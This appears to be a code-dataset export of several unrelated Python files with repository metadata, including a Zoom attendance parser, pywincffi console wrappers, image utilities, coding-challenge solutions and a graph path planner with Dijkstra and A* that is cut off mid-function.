#이해관계검사
#키워드 매개변수(심사후보자_공저자csv path, 심사후보자_정보csv path, 심사후보자_공저자네트워크csv path,
#전문성검사결과_DataFrame, 투고원고_DataFrame, i번째 투고 원고, 추천할 심사자 수, 심사후보자_공저자네트워크_곱셈횟수)
reviewer_rank = interest(
co_author_path='../reviewer_pool/reviewer_coauthor_5.csv',
reviewer_information_path='../reviewer_pool/reviewer_information_5.csv',
co_author_network_path='../reviewer_pool/co_author_network_0525.csv',
professionalism_result=reviewer,
extractive_keyword_result=reviewee,
reviewee_index=i,
top_limit=6,
matrix_multifly_count=1)
#return type : pandas.dataframe
#csv저장
#키워드 매개변수(save_path, 투고원고_DataFrame, 전문성검사_DataFrame, i번째 투고 원고, 추천할 심사자 수)
save_csv(output_path='../system_output/export_csv_0525_10.csv',
extractive_keyword_result=reviewee,
professionalism_result=reviewer_rank,
reviewee_index=i,
top_limit=3)
#균등할당
#키워드 매개변수(입력 path)
equl_distribution(input_csv_path='../system_output/export_csv_0525_10.csv',
output_csv_path='../system_output/final_csv_0525_10.csv')
if __name__ == '__main__':
#디폴트 실행 함수
main()
| 29.01855
| 179
| 0.609949
| 544
| 0.029972
| 0
| 0
| 0
| 0
| 0
| 0
| 3,256
| 0.179394
|
3c988a3bbfa24fe5c3273607b2e3a5909c559524
| 2,241
|
py
|
Python
|
controlimcap/models/flatattn.py
|
SikandarBakht/asg2cap
|
d8a6360eaccdb8c3add5f9c4f6fd72764e47e762
|
[
"MIT"
] | 169
|
2020-03-15T08:41:39.000Z
|
2022-03-30T09:36:17.000Z
|
controlimcap/models/flatattn.py
|
wtr850/asg2cap
|
97a1d866d4a2b86c1f474bb168518f97eb2f8b96
|
[
"MIT"
] | 25
|
2020-05-23T15:14:00.000Z
|
2022-03-10T06:20:31.000Z
|
controlimcap/models/flatattn.py
|
wtr850/asg2cap
|
97a1d866d4a2b86c1f474bb168518f97eb2f8b96
|
[
"MIT"
] | 25
|
2020-04-02T10:08:01.000Z
|
2021-12-09T12:10:10.000Z
|
import torch
import torch.nn as nn
import framework.configbase
import caption.encoders.vanilla
import caption.decoders.attention
import caption.models.attention
import controlimcap.encoders.flat
from caption.models.attention import MPENCODER, ATTNENCODER, DECODER
class NodeBUTDAttnModel(caption.models.attention.BUTDAttnModel):
def forward_encoder(self, input_batch):
attn_embeds = self.submods[ATTNENCODER](input_batch['attn_fts'])
graph_embeds = torch.sum(attn_embeds * input_batch['attn_masks'].unsqueeze(2), 1)
graph_embeds = graph_embeds / torch.sum(input_batch['attn_masks'], 1, keepdim=True)
enc_states = self.submods[MPENCODER](
torch.cat([input_batch['mp_fts'], graph_embeds], 1))
return {'init_states': enc_states, 'attn_fts': attn_embeds}
class NodeRoleBUTDAttnModelConfig(caption.models.attention.AttnModelConfig):
def __init__(self):
super().__init__()
self.subcfgs[ATTNENCODER] = controlimcap.encoders.flat.EncoderConfig()
class NodeRoleBUTDAttnModel(caption.models.attention.BUTDAttnModel):
def build_submods(self):
submods = {}
submods[MPENCODER] = caption.encoders.vanilla.Encoder(self.config.subcfgs[MPENCODER])
submods[ATTNENCODER] = controlimcap.encoders.flat.Encoder(self.config.subcfgs[ATTNENCODER])
submods[DECODER] = caption.decoders.attention.BUTDAttnDecoder(self.config.subcfgs[DECODER])
return submods
def prepare_input_batch(self, batch_data, is_train=False):
outs = super().prepare_input_batch(batch_data, is_train=is_train)
outs['node_types'] = torch.LongTensor(batch_data['node_types']).to(self.device)
outs['attr_order_idxs'] = torch.LongTensor(batch_data['attr_order_idxs']).to(self.device)
return outs
def forward_encoder(self, input_batch):
attn_embeds = self.submods[ATTNENCODER](input_batch['attn_fts'],
input_batch['node_types'], input_batch['attr_order_idxs'])
graph_embeds = torch.sum(attn_embeds * input_batch['attn_masks'].unsqueeze(2), 1)
graph_embeds = graph_embeds / torch.sum(input_batch['attn_masks'], 1, keepdim=True)
enc_states = self.submods[MPENCODER](
torch.cat([input_batch['mp_fts'], graph_embeds], 1))
return {'init_states': enc_states, 'attn_fts': attn_embeds}
| 43.096154
| 95
| 0.764391
| 1,965
| 0.876841
| 0
| 0
| 0
| 0
| 0
| 0
| 217
| 0.096832
|
3c99a84bfa19cff4eef1b2a7eb8aeb82d35b63a6
| 5,169
|
py
|
Python
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 10
|
2015-11-19T12:39:50.000Z
|
2021-02-21T20:15:29.000Z
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 109
|
2015-06-15T05:03:33.000Z
|
2018-01-14T10:18:48.000Z
|
pywincffi/kernel32/console.py
|
opalmer/pycffiwin32
|
39210182a92e93c37a9f1c644fd5fcc1aa32f6d1
|
[
"MIT"
] | 8
|
2015-07-29T04:18:27.000Z
|
2018-11-02T17:15:40.000Z
|
"""
Console
-------
A module containing functions for interacting with a Windows
console.
"""
from six import integer_types
from pywincffi.core import dist
from pywincffi.core.checks import NON_ZERO, NoneType, input_check, error_check
from pywincffi.exceptions import WindowsAPIError
from pywincffi.wintypes import HANDLE, SECURITY_ATTRIBUTES, wintype_to_cdata
def SetConsoleTextAttribute(hConsoleOutput, wAttributes):
"""
Sets the attributes of characters written to a console buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/setconsoletextattribute
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:param int wAttributes:
The character attribute(s) to set.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
input_check("wAttributes", wAttributes, integer_types)
ffi, library = dist.load()
# raise Exception(type(wAttributes))
# info = ffi.new("PCHAR_INFO")
code = library.SetConsoleTextAttribute(
wintype_to_cdata(hConsoleOutput),
ffi.cast("ATOM", wAttributes)
)
error_check("SetConsoleTextAttribute", code=code, expected=NON_ZERO)
def GetConsoleScreenBufferInfo(hConsoleOutput):
"""
Retrieves information about the specified console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/getconsolescreenbufferinfo
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:returns:
Returns a ffi data structure with attributes corresponding to
the fields on the ``PCONSOLE_SCREEN_BUFFER_INFO`` struct.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
ffi, library = dist.load()
info = ffi.new("PCONSOLE_SCREEN_BUFFER_INFO")
code = library.GetConsoleScreenBufferInfo(
wintype_to_cdata(hConsoleOutput), info)
error_check("GetConsoleScreenBufferInfo", code, expected=NON_ZERO)
return info
def CreateConsoleScreenBuffer(
dwDesiredAccess, dwShareMode, lpSecurityAttributes=None, dwFlags=None):
"""
Creates a console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/createconsolescreenbuffer
:type dwDesiredAccess: int or None
:param dwDesiredAccess:
The access to the console screen buffer. If `None` is provided
then the Windows APIs will use a default security descriptor.
:type dwShareMode: int or None
:param dwShareMode:
Controls the options for sharing the resulting handle. If `None` or
0 then the resulting buffer cannot be shared.
:keyword pywincffi.wintypes.SECURITY_ATTRIBUTES lpSecurityAttributes:
Extra security attributes that determine if the resulting handle
can be inherited. If `None` is provided, which is the default, then
the handle cannot be inherited.
:keyword int dwFlags:
The type of console buffer to create. The flag is superficial because
it only accepts None or ``CONSOLE_TEXTMODE_BUFFER`` as inputs. If no
value is provided, which is the default, then
``CONSOLE_TEXTMODE_BUFFER`` is automatically used.
:rtype: :class:`pywincffi.wintypes.HANDLE``
:returns:
Returns the handle created by the underlying C function.
:func:`pywincffi.kernel32.CloseHandle` should be called on the handle
when you are done with it.
"""
ffi, library = dist.load()
if dwDesiredAccess is None:
dwDesiredAccess = ffi.NULL
if dwShareMode is None:
dwShareMode = 0
if dwFlags is None:
dwFlags = library.CONSOLE_TEXTMODE_BUFFER
input_check(
"dwDesiredAccess", dwDesiredAccess, allowed_values=(
ffi.NULL,
library.GENERIC_READ,
library.GENERIC_WRITE,
library.GENERIC_READ | library.GENERIC_WRITE
))
input_check(
"dwShareMode", dwShareMode, allowed_values=(
0,
library.FILE_SHARE_READ,
library.FILE_SHARE_WRITE,
library.FILE_SHARE_READ | library.FILE_SHARE_WRITE,
))
input_check(
"dwFlags", dwFlags,
allowed_values=(
library.CONSOLE_TEXTMODE_BUFFER,
))
input_check(
"lpSecurityAttributes", lpSecurityAttributes,
allowed_types=(NoneType, SECURITY_ATTRIBUTES))
if lpSecurityAttributes is None:
lpSecurityAttributes = ffi.NULL
handle = library.CreateConsoleScreenBuffer(
ffi.cast("DWORD", dwDesiredAccess),
ffi.cast("DWORD", dwShareMode),
lpSecurityAttributes,
ffi.cast("DWORD", dwFlags),
ffi.NULL # _reserved_
)
if handle == library.INVALID_HANDLE_VALUE: # pragma: no cover
raise WindowsAPIError(
"CreateConsoleScreenBuffer", "Invalid Handle",
library.INVALID_HANDLE_VALUE,
expected_return_code="not INVALID_HANDLE_VALUE")
return HANDLE(handle)
| 32.923567
| 83
| 0.691623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,739
| 0.52989
|
3c9a8ed33f779646dc17846360f63018c12812e8
| 2,568
|
py
|
Python
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 1
|
2021-03-23T15:32:39.000Z
|
2021-03-23T15:32:39.000Z
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 7
|
2021-02-05T00:52:08.000Z
|
2022-03-01T21:37:43.000Z
|
src/extractClimateObservations.py
|
bcgov/nr-rfc-ensweather
|
5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6
|
[
"Apache-2.0"
] | 2
|
2021-02-24T20:29:39.000Z
|
2021-03-23T15:32:44.000Z
|
"""
extracts the climate observation data from the xlsx spreadsheet to a csv file
so that ens weather scripts can consume it.
Looks in the folder os.environ["ENS_CLIMATE_OBS"]
determines the relationship between the xlsx source and the csv destinations
deleteds any csv's and regenerates them by exporting the ALL_DATa sheet
from the corresponding xlsx file
"""
import csv
import glob
import logging.config
import openpyxl
import os
import pandas as pd
import config.logging_config
logging.config.dictConfig(config.logging_config.LOGGING_CONFIG)
LOGGER = logging.getLogger(__name__)
excelFileDir = os.environ["ENS_CLIMATE_OBS"]
excelFileGlobPattern = "ClimateDataOBS_*.xlsx"
csvFileNamePattern = "climate_obs_{year}.csv"
sheetName = 'ALL_DATA'
def convertCsvXlrd(excelFile, sheetName, csvFile):
# print(f"sheetname: {sheetName}") read_only=True
wb = openpyxl.load_workbook(excelFile, data_only=True, keep_vba=True, read_only=True)
sh = wb[sheetName]
if sh.calculate_dimension() == "A1:A1":
sh.reset_dimensions()
with open(csvFile, "w", newline="") as f:
c = csv.writer(f)
cnt = 0
for r in sh.iter_rows(): # generator; was sh.rows
c.writerow([cell.value for cell in r])
#print(cnt)
cnt += 1
def convertCsvPandas(excelFile, csvFileFullPath):
"""
Doesn't work for some reason
"""
data_xls = pd.read_excel(excelFile, sheet_name="ALL_DATA")
data_xls.to_csv(csvFileFullPath, encoding="utf-8", index=False, header=True)
if __name__ == "__main__":
globDir = os.path.join(excelFileDir, excelFileGlobPattern)
LOGGER.debug(f"glob pattern: {excelFileGlobPattern}")
excelClimateObservationFiles = glob.glob(globDir)
for excelFile in excelClimateObservationFiles:
LOGGER.info(f"input excelFile: {excelFile}")
# extract the year from the filename
excelFileBasename = os.path.basename(excelFile)
year = os.path.splitext(excelFileBasename)[0].split("_")[1]
LOGGER.debug(f"year from excel file parse: {year}")
csvFileName = csvFileNamePattern.format(year=year)
LOGGER.info(f"output csv file: {csvFileName}")
csvFileFullPath = os.path.join(excelFileDir, csvFileName)
if os.path.exists(csvFileFullPath):
LOGGER.info(f"deleting the csv file: {csvFileFullPath}")
os.remove(csvFileFullPath)
LOGGER.info(f"dumping the sheet: {sheetName} from the file {excelFile} to {csvFileFullPath}")
convertCsvXlrd(excelFile, sheetName, csvFileFullPath)
| 35.178082
| 101
| 0.712227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 908
| 0.353583
|
3c9b6cb2f965c39ce2408034c9338f67c659fa02
| 403
|
py
|
Python
|
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | 1
|
2015-08-01T04:03:47.000Z
|
2015-08-01T04:03:47.000Z
|
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | null | null | null |
Python/Basic Data Types/finding-the-percentage.py
|
mateusnr/hackerrank-solutions
|
2fa60bae480d8afb46e3d99929707a7d9d92858f
|
[
"CC0-1.0"
] | 4
|
2020-05-04T15:12:21.000Z
|
2021-02-18T11:58:30.000Z
|
n = int(input()) # takes the number of arguments
mdict = {}
for i in range(0,n):
grades = input().split(" ") # self explanatory
scores = list(map(float, grades[1:])) # since the first element from the list grades is the name of the student
mdict[grades[0]] = sum(scores)/float(len(scores)) # the key is the name of the student and the value is the average
print("%.2f" % mdict[input()])
| 50.375
| 120
| 0.665012
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 196
| 0.486352
|
3c9c7350a4efa3be4f373180a4fc5ceaa1d748e4
| 2,764
|
py
|
Python
|
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
src/6_ZigZagConversion.py
|
chenbin11200/AlgorithmInPython
|
222780f14afdafc4c7d0047b6f1477bd0b0ecf0f
|
[
"MIT"
] | null | null | null |
class Solution(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
evenColumnIndex = True
result = []
stringLength = len(s)
if numRows >= stringLength or numRows == 1:
return s
fullLine = numRows
groupLine = 2 * fullLine - 2
i = rowIndex = 0
for rowIndex in range(0, fullLine):
i = rowIndex
evenColumnIndex = True
while i < stringLength:
result.append(s[i])
if rowIndex == 0 or rowIndex == numRows - 1:
i = i + groupLine
else:
if evenColumnIndex:
i = i + groupLine - rowIndex * 2
else:
i = i + rowIndex * 2
evenColumnIndex = not evenColumnIndex
rowIndex = rowIndex + 1
return ''.join(result)
class BestSolution(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or numRows >= len(s):
return s
L = [''] * numRows
index, step = 0, 1
for x in s:
L[index] += x
if index == 0:
step = 1
elif index == numRows - 1:
step = -1
index += step
return ''.join(L)
# This is NOT zigzag conversion, instead it is
# 1 5 9
# 2 4 6 8 .
# 3 7 .
class Solution2(object):
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
evenRowIndex = evenColumnIndex = True
result = []
stringLength = len(s)
if numRows >= stringLength or numRows == 1:
return s
fullLine = numRows
leckLine = (numRows + 1) / 2
groupLine = 2 * fullLine - leckLine
i = rowIndex = 0
for rowIndex in range(0, fullLine):
i = rowIndex
evenColumnIndex = True
while i < stringLength:
if evenRowIndex:
result.append(s[i])
i = i + groupLine
else:
result.append(s[i])
if evenColumnIndex:
i = i + (fullLine - rowIndex - 1) + (rowIndex + 1) / 2
else:
i = i + (fullLine - leckLine) - rowIndex / 2 + rowIndex
evenColumnIndex = not evenColumnIndex
rowIndex = rowIndex + 1
evenRowIndex = not evenRowIndex
return ''.join(result)
print BestSolution().convert('abc', 2)
| 27.098039
| 79
| 0.45152
| 2,636
| 0.95369
| 0
| 0
| 0
| 0
| 0
| 0
| 341
| 0.123372
|
3c9d412ce7e720587944a183ef63dc8c3a37cb1a
| 2,437
|
py
|
Python
|
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | 1
|
2020-12-30T19:39:56.000Z
|
2020-12-30T19:39:56.000Z
|
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | null | null | null |
server/server/parsing/session.py
|
PixelogicDev/zoom_attendance_check
|
7c47066d006ae2205ccb04371115904ec48e3bda
|
[
"MIT"
] | null | null | null |
import pandas as pd
class Session:
def __init__(self, students_df, df_session_chat, meta_data):
self._first_message_time = df_session_chat["time"].sort_values().iloc[0]
self._relevant_chat = self.get_participants_in_session(students_df, df_session_chat, meta_data)
@ staticmethod
def get_participants_in_session(df_students, df_chat, meta_data):
"""
finds students that attendant to the session. runs over each mode which represent different way to declare that
the student attendant (for example: phone number, ID). merges this data to the csv table with the zoom name that
added it
:param df_chat: that table of the chat for the specific session
:return: df of the attendance in the session
"""
final_df = None
for mode in meta_data.filter_modes:
merged_df = pd.merge(df_students, df_chat.reset_index(), left_on=mode, right_on="message", how="left")
final_df = pd.concat([merged_df, final_df])
final_df.sort_values(by="time", inplace=True)
df_participated = final_df.groupby("zoom_name").first().reset_index()
df_participated["index"] = df_participated["index"].astype(int)
df_participated = df_participated.loc[:, ["id", "zoom_name", "time", "message", "index"]].set_index("index")
filt = df_chat['zoom_name'].str.contains('|'.join(meta_data.zoom_names_to_ignore))
df_relevant_chat = pd.merge(df_chat[~filt], df_participated, how="left")
df_relevant_chat["relevant"] = df_relevant_chat["id"].apply(lambda x: 1 if x == x else 0)
df_relevant_chat["id"] = df_relevant_chat["id"].apply(lambda x: int(x) if x == x else -1)
return df_relevant_chat
def zoom_names_table(self, session_id):
zoom_df = self._relevant_chat.loc[:, ["zoom_name", "id"]].rename(columns={"zoom_name": "name", "id": "student_id"})
zoom_df['session_id'] = pd.Series([session_id] * zoom_df.shape[0])
return zoom_df.sort_values(by="student_id", ascending=False).groupby("name").first().reset_index()
def chat_table(self, zoom_df):
relevant_chat = self._relevant_chat.drop(columns=["id"])
chat_session_table = pd.merge(relevant_chat, zoom_df, left_on="zoom_name", right_on="name")
return chat_session_table.drop(columns=["zoom_name", "name", "session_id", "student_id"]).rename(columns={"id": "zoom_names_id"})
| 55.386364
| 137
| 0.684858
| 2,416
| 0.991383
| 0
| 0
| 1,454
| 0.596635
| 0
| 0
| 695
| 0.285187
|
3c9f1d64c05ce80fd3ad121b31d428afa01b9e36
| 4,538
|
py
|
Python
|
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | 2
|
2021-04-26T14:41:11.000Z
|
2021-08-20T09:13:03.000Z
|
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | null | null | null |
project/image.py
|
Mandrenkov/SVBRDF-Texture-Synthesis
|
7e7282698befd53383cbd6566039340babb0a289
|
[
"MIT"
] | null | null | null |
import imageio # type: ignore
import logging
import numpy # type: ignore
import os
import pathlib
import torch
import torchvision # type: ignore
import utils
from torch import Tensor
from typing import Callable
def load(path: str, encoding: str = 'RGB') -> Tensor:
'''
Loads the image at the given path using the supplied encoding.
Args:
path: Path to the image.
encoding: Encoding of the image.
Returns:
Tensor [R, C, X] representing the normalized pixel values in the image.
'''
assert path, "Path cannot be empty or set to None."
array = imageio.imread(path)
device = utils.get_device_name()
image = torchvision.transforms.ToTensor()(array).to(device).permute(1, 2, 0)[:, :, :3]
if encoding == 'sRGB':
image = convert_sRGB_to_RGB(image)
elif encoding == 'Greyscale':
image = convert_RGB_to_greyscale(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
logging.debug('Loaded image from "%s"', path)
return image
def save(path: str, image: Tensor, encoding: str = 'RGB') -> None:
'''
Saves the given image to the specified path using the supplied encoding.
Args:
path: Path to the image.
image: Tensor [R, C, X] of normalized pixel values in the image.
encoding: Encoding of the image.
'''
assert path, "Path cannot be empty or set to None."
assert torch.all(0 <= image) and torch.all(image <= 1), "Image values must fall in the closed range [0, 1]."
if encoding == 'sRGB':
image = convert_RGB_to_sRGB(image)
elif encoding == 'Greyscale':
image = convert_greyscale_to_RGB(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
imageio.imwrite(path, torch.floor(255 * image).detach().cpu().numpy().astype(numpy.uint8))
logging.debug('Saved image to "%s"', path)
def clamp(function: Callable[[Tensor], Tensor]) -> Callable:
'''
Decorator which clamps an image destined for the given function to the range [ϵ, 1]. Note that ϵ is used in favour
of 0 to enable differentiation through fractional exponents.
Args:
function: Function that accepts an image Tensor as input.
Returns:
Wrapper which implements the aforementioned behaviour.
'''
return lambda image: function(image.clamp(1E-8, 1))
@clamp
def convert_sRGB_to_RGB(image: Tensor) -> Tensor:
'''
Converts an sRGB image into a linear RGB image.
Args:
image: Tensor [R, C, 3] of an sRGB image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) >= 3 and image.size(-1) == 3, 'sRGB image must have dimensionality [*, R, C, 3].'
below = (image <= 0.04045) * image / 12.92
above = (image > 0.04045) * ((image + 0.055) / 1.055)**2.4
return below + above
@clamp
def convert_RGB_to_sRGB(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into an sRGB image.
Args:
image: Tensor [R, C, 3] of a linear RGB image.
Returns:
Tensor [R, C, 3] of an sRGB image.
'''
assert len(image.shape) >= 3 and image.size(-1) == 3, 'RGB image must have dimensionality [*, R, C, 3].'
below = (image <= 0.0031308) * image * 12.92
above = (image > 0.0031308) * (1.055 * image**(1 / 2.4) - 0.055)
return below + above
def convert_RGB_to_greyscale(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into a greyscale image.
Args:
image: Tensor [R, C, 3] of an RGB image.
Returns:
Tensor [R, C, 1] of a greyscale image.
'''
assert len(image.shape) == 3 and (image.size(2) == 1 or image.size(2) == 3), 'RGB image must have dimensionality [R, C, 1] or [R, C, 3].'
if image.size(2) == 3:
assert torch.all((image[:, :, 0] == image[:, :, 1]) & (image[:, :, 0] == image[:, :, 2])), 'RGB image must have the same value across each colour channel.'
return image[:, :, [0]]
return image
def convert_greyscale_to_RGB(image: Tensor) -> Tensor:
'''
Converts a greyscale image into a linear RGB image.
Args:
image: Tensor [R, C, 1] of a greyscale image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) == 3 and image.size(2) == 1, 'Greyscale image must have dimensionality [R, C, 1].'
return image.expand(-1, -1, 3)
| 32.884058
| 163
| 0.628691
| 0
| 0
| 0
| 0
| 991
| 0.218282
| 0
| 0
| 2,254
| 0.496476
|
b1af4bb14846eb251b39a1c7a18e1ee46ffce810
| 12,611
|
py
|
Python
|
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
node_graph.py
|
JasonZhuGit/py_path_planner
|
e045a076c2c69284f1f977420ad93a966161e012
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import matplotlib.pyplot as plt
import numpy as np
from vertex import Vertex
from heap import PriorityQueue
class NodeGraph():
'''
The NodeGraph conception comes from computer science textbooks work on graphs
in the mathematical sense―a set of vertices with edges connecting them.
It contrasts with GridGraph, which looks like a tiled game map
'''
pass
class LNodeGraph(NodeGraph): #save as linked list
def __init__(self, vertices=None, positions=None, weights=None, heuristic=None): #edges
self.vertices = vertices
self.positions = positions
self.weights = weights
self.heuristic = heuristic
@property
def vertices(self):
return self._vertices
@vertices.setter
def vertices(self, vertices=None):
self._vertices = {}
if isinstance(vertices, list):
for chain in vertices:
head = Vertex(chain[0])
head.weight = 0
for sub_vertex in chain[-1:0:-1]:
head.insert(sub_vertex, weight=1)
self._vertices[chain[0]] = head
@property
def weights(self): #weight saved in sub/copied vertex, return with edges
return self.edges
@weights.setter
def weights(self, weights):
if isinstance(weights, dict):
for from_u, head in self.vertices.items():
to_v = head.succ
while to_v:
edge = (from_u, to_v.name)
if edge in weights:
to_v.weight = weights[edge]
else:
to_v.weight = 0
to_v = to_v.succ
@property
def positions(self):
return self._positions
@positions.setter
def positions(self, positions):
self._positions = positions
@property
def heuristic(self):
_heuristic = {}
for name, ver in self.vertices.items():
_heuristic[name] = ver.heur
return _heuristic
@heuristic.setter
def heuristic(self, heuristic):
if isinstance(heuristic, dict):
for name, ver in self.vertices.items():
if name in heuristic:
ver.heur = heuristic[name]
else:
ver.heur = float('inf')
@property
def edges(self):
if not hasattr(self, "_edges"):
self._edges = {}
for from_u, chain in self.vertices.items():
to_v = chain.succ
while to_v:
self._edges[(from_u, to_v.name)] = to_v.weight
to_v = to_v.succ
return self._edges
def check_edge(self, from_u, to_v):
if from_u not in self.vertices or to_v not in self.vertices:
return False
succ = self.vertices[from_u].succ
while succ:
if succ.name == to_v:
return True
succ = succ.suc
return False
def BFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
def BFS(self, s):
if not s in self.vertices:
return False
self.BFS_reset_vertices()
self.vertices[s].visited = 1
self.vertices[s].dist = 0
self.vertices[s].weight = 0
queue = []
queue.append(s)
while queue:
from_u = queue.pop(0)
succ_ver = self.vertices[from_u].succ
while succ_ver:
to_v = succ_ver.name
if self.vertices[to_v].visited == 0:
self.vertices[to_v].visited = 1
self.vertices[to_v].prec = from_u #or self.vertices[from_u].dist
self.vertices[to_v].dist = self.vertices[from_u].dist + succ_ver.weight
self.vertices[to_v].dist = self.vertices[from_u].dist + 1
queue.append(to_v)
succ_ver = succ_ver.succ
self.vertices[from_u].visited = 2
return True
def DFS_reset_vertices(self):
for v in self.vertices.values():
v.reset()
v.dist = float("inf")
def DFS_trackback(self, from_u):
self._steps += 1
self.vertices[from_u].entry = self._steps
self.vertices[from_u].visited = 1
succ_v = self.vertices[from_u].succ
while succ_v:
to_v = succ_v.name
if self.vertices[to_v].visited == 0:
self.vertices[to_v].prec = from_u
self.DFS_trackback(succ_v.name)
succ_v = succ_v.succ
self._steps += 1
self.vertices[from_u].back = self._steps
self.vertices[from_u].visited = 2
def DFS(self):
self.DFS_reset_vertices()
self._steps = 0
for from_u in self.vertices.keys():
if self.vertices[from_u].visited == 0:
self.DFS_trackback(from_u)
def Dijkstra_reset_vertices(self):
for vertex in self.vertices.values():
vertex.dist = float('inf')
vertex.prec = None
# vertex.visited = 0 # not used
def Dijkstra(self, start):
self.Dijkstra_reset_vertices()
self.vertices[start].dist = 0
#全量加入,逐步加入均可,此处采用全量加入, 增量加入即 OPEN、CLOSE、UNUSED情况,减少节点数
priQueue = PriorityQueue(list(self.vertices.values()), sortby='dist')
while priQueue:
from_u = priQueue.dequeue()
to_v = from_u.succ
while to_v:
new_dist = from_u.dist + to_v.weight
if new_dist < self.vertices[to_v.name].dist:
self.vertices[to_v.name].dist = new_dist
self.vertices[to_v.name].prec = from_u.name
to_v = to_v.succ
def AStar_reset_vertex(self):
for vertex in self.vertices.values():
vertex.dist = float('inf')
vertex.prec = None
# vertex.visited = 0 #not used
def AStar(self, start, goal):
self.AStar_reset_vertex()
self.vertices[start].dist = 0
preQueue = PriorityQueue([self.vertices[start]], sortby=['dist', 'heur']) #按 dist+heur 进行排序
# preQueue is on behalf of OPEN
while preQueue:
from_u = preQueue.dequeue() #dist+heur 值最小的进行选择
if from_u.name == goal:
return self.AStar_reconstruct_path(start, goal) #把路径翻转重建
else:
to_v = from_u.succ
while to_v:
tentative_dist = from_u.dist + to_v.weight
to_v_name = to_v.name
if tentative_dist < self.vertices[to_v_name].dist:
self.vertices[to_v_name].dist = tentative_dist
self.vertices[to_v_name].prec = from_u.name
if not to_v in preQueue:
preQueue.enqueue(self.vertices[to_v_name]) #重复访问的问题(先出,后进)当heuristic/启发函数的设置满足一致性条件时,每个节点最多访问一次, 会不会陷入死循环呢?
to_v = to_v.succ
return False #未找到目标
def AStar_reconstruct_path(self, start, goal):
path = [goal]
prec_u = self.vertices[goal].prec
while prec_u:
path.append(prec_u)
if prec_u == start:
break
prec_u = self.vertices[prec_u].prec
path = path[-1::-1]
return path
@property
def fig(self):
if not hasattr(self, "_fig"):
self._fig = plt.gcf()
self._fig.set_figheight(6)
self._fig.set_figwidth(12)
self._fig.gca().axis("off")
return self._fig
def draw_init(self):
return self.fig
def draw_vertices(self, heuristic=False, color='blue'):
pos_array = np.array(list(self.positions.values()))
plt.scatter(pos_array[:, 0], pos_array[:, 1],
s=1000, c=color, marker='o', alpha=0.9)
for name, pos in self.positions.items():
plt.annotate(name, (pos[0]-0.009, pos[1]-0.015),
fontsize=20, color='white', multialignment='center')
if heuristic:
plt.annotate("h="+str(self.vertices[name].heur), (pos[0]-0.02, pos[1]+0.09),
fontsize=15, color='black', backgroundcolor='white')
def draw_edges(self, weight=False, color='blue'):
for edge in self.edges.keys():
from_u = self.positions[edge[0]]
to_v = self.positions[edge[1]]
plt.plot([from_u[0], to_v[0]], [from_u[1], to_v[1]],
color=color, linewidth=2, alpha=0.9)
# edges' lables
if weight:
center = [(from_u[0] + to_v[0])/2-0.009, (from_u[1] + to_v[1])/2-0.015]
